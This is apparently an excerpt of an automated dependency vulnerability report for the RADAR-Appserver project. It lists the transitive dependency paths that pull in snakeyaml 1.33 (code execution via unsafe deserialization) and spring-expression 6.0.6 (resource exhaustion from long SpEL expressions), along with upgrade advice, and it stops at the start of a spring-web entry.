Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.yaml:snakeyaml@1.33
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.yaml:snakeyaml@1.33
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.yaml:snakeyaml@1.33
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.yaml:snakeyaml@1.33
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › io.swagger.core.v3:swagger-core-jakarta@2.2.25 › org.yaml:snakeyaml@1.33Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › io.swagger.core.v3:swagger-core-jakarta@2.2.25 › com.fasterxml.jackson.dataformat:jackson-dataformat-yaml@2.16.2 › org.yaml:snakeyaml@1.33Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0.
Overview
org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.
Affected versions of this package are vulnerable to Arbitrary Code Execution in the Constructor class, which does not restrict which types can be deserialized. This vulnerability is exploitable by an attacker who provides a malicious YAML file for deserialization, which circumvents the SafeConstructor class.
The maintainers of the library contend that the application's trust would already have had to be compromised or established and therefore dispute the risk associated with this issue on the basis that there is a high bar for exploitation.
Remediation
Upgrade org.yaml:snakeyaml to version 2.0 or higher.
References
medium severity
- Vulnerable module: org.springframework:spring-expression
- Introduced through: org.radarbase:radar-spring-auth@1.2.1, org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-expression@6.0.6Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-health@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-mail@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.data:spring-data-jpa@4.1.0-M2 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-mail@4.1.0-M4 › org.springframework:spring-context-support@7.0.6 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework:spring-context-support@7.0.6 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-config@7.1.0-M3 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-config@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot-actuator@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-commons@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-sql@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-M4 › org.springframework.boot:spring-boot-jackson@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-servlet@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-config@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-micrometer-observation@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-commons@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-sql@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-sql@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
Overview
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when a user provides a very long SpEL expression.
Remediation
Upgrade org.springframework:spring-expression to version 5.2.24.RELEASE, 5.3.27, 6.0.8 or higher.
References
medium severity
- Vulnerable module: org.springframework:spring-web
- Introduced through: org.radarbase:radar-spring-auth@1.2.1, org.springframework.boot:spring-boot-starter-web@4.1.0-M4 and others
Detailed paths
-
